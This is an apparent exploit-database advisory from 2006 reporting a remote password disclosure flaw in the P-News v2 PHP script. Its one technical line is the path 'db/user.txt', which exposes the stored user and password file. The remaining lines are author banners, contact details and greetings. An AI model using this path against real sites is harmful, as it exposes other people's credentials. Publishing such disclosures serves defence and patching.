id: 1217
date: 11/28/2006
title: P-News v2 (user.txt) Remote Password Disclosure Vulnerability
author: Lu7k
cves: 

=============================================================
P-News v2 (user.txt) Remote Password Disclosure Vulnerability
=============================================================


P-News V2 -  (user.txt)  Information Disclosure Vulnerability


**************************************************************
Critical Level : Dangerous
**************************************************************
Script Download: http://download.planerd.net/dir/php
**************************************************************
Bugfounder: Lu7k
**************************************************************
Contact Me : www.school-of-hack.de or lu7k@mail.nu
**************************************************************

-----------------------------------------------------------------------------

Code:http://target/path/db/user.txt

-----------------------------------------------------------------------------

*************************************************************
Greetings: Bdrok - TheJT - MyMaster 
*************************************************************





#  0day.today [2023-03-23]  #